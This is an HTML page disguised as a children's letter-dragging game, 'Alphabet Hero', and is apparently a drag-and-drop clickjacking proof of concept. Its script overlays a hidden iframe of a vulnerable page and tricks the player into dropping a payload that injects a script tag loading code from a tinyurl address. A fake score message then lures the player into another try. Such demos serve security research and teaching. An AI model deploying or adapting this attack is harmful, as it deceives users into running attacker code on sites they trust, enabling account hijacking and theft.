<!doctype html>
<html>
<head>
<script src="http://code.jquery.com/jquery-1.5.1.min.js"></script>
<script>
$(function() {

  // http://www.html5rocks.com/tutorials/dnd/basics/
  var follow = function(e) {
    $('#victim').css({'top': e.pageY-10, 'left': e.pageX-20});
  }, unfollow = function() {
    $(document).unbind('mousemove', follow);
    $('#victim').css({'left': 500, top: 350});
  }, current_letter
   , letters = ['A', 'I', 'X' ,'H', 'D'];

  var pwn = function() {
    $("#payload")
      .bind('dragstart',function(e) {
        e.originalEvent.dataTransfer.setData('text/plain', $(this).attr('data-payload'));
        follow(e);
      })
      .bind('dragend', function() {
        $(this).hide();
        unfollow();
        $('#score').fadeIn('slow');
      }).show();

    $("#victim").show().get(0).scrollTop = 175; // position the frame to vulnerable input

    $('.letters').bind('dragover', follow);
  };

  var next = function() {
    if (current_letter >= letters.length) {
      pwn();
      return;
    }

    $('<div class=source-letter>')
      .text(letters[current_letter])
      .attr('draggable', 'true')
      .bind('dragstart', function(e) {
        e.originalEvent.dataTransfer.setData('text', 'dummy'); // required otherwise doesn't work
       })
      .bind('dragend', function() {
        $(this).remove();
        next();
        return false;
      }).appendTo('#respawn-point');

    current_letter++;
  };

  $('#score').click(function() {
    // failure, entice to try again
    alert('Nice work, your score is ' + Math.floor(Math.random()*100) + ', start next level!');
    $("#game,#score").hide();
    $('#start').show();
    return false;
  });

  $("#start").click(function() {
    $(this).hide();
    $("#game").show();
    current_letter = 0;
    $('.letters').unbind('dragover', follow);
    next();
  });

});

</script>
<style>
#victim {
opacity: 0.5;
position: absolute;
display: none;
top: 210px;
left: 135px;
overflow: hidden;
width:400px;
height: 20px;
}

#start {
font-size: 35px;
}
#score {
position: absolute;
display: block;
top: 350px;
left: 720px;
font-size: 12px;
font-family: Verdana;
background: yellow;
padding: 2px;
border: 1px outset black;
}

#payload {
display: none;
}

.source-letter {
font-size: 30px;
width: 25px;
border: 0;
font-family: Verdana, sans-serif;
color: green;
cursor: move;
}

#letters {
font-size: 70px;
font-family: Verdana, sans-serif;
color: red;
width: 70px;
position: absolute;
top: 0;
left: 145px;
}

#letters2 {
font-size: 70px;
font-family: Verdana, sans-serif;
color: red;
width: 70px;
position: absolute;
top: -10px;
left: 0px;
}

#letters3 {
font-size: 70px;
font-family: Verdana, sans-serif;
color: red;
width: 70px;
position: absolute;
top: 20px;
left: 70px;
}


#respawn-point {
position: absolute;
left: -200px;
height: 95px;
width: 79px;
}

#game {
height: 400px;
padding-top: 100px;
margin-left: 200px;
position: relative;
display: none;
}

</style>
<title>Alphabet Hero</title>
</head>
<body>
<h1>Alphabet Hero</h1>
<p>Drag <span style="color:green">green</span> letter to corresponding lowercase <span style="color:red">red</span> letter on the right. For example: drag "<span style="color:green">P</span>" to "<span style="color:red">p</span>".
The cursor will change to hint you that you're on the right track.</p>
<button id="start">Start game!</button>
<div id=game>
  <div class=letters id=letters2><span>h</span> <span>i</span> <span>n</span> <span>c</span></div><div class=letters id=letters><span>a</span> <span>d</span> <span>g</span> <span>x</span></div><div class=letters id=letters3><span>q</span> <span>p</span> <span>w</span> <span>e</span></div>
  <div id=respawn-point>
    <div class=source-letter id="payload" draggable=true data-payload='GOOG" // &lt;SCRIPT src="http://tinyurl.com/UPRCSONLYALRT"&gt;&lt;/script&gt;'>G</div>
  </div>
</div>
<a id=score style="display:none" href="#">Check score</a>
<div id=victim>
  <iframe src="vuln.html" border=0 scrolling=no width=400 height=300></iframe>
</div>
<ziframe title="YouTube video player" width="1" height="1" src="http://www.youtube.com/embed/mqdRDXPsmAY?autoplay=1" frameborder="0" allowfullscreen></ziframe>
</body>
</html>
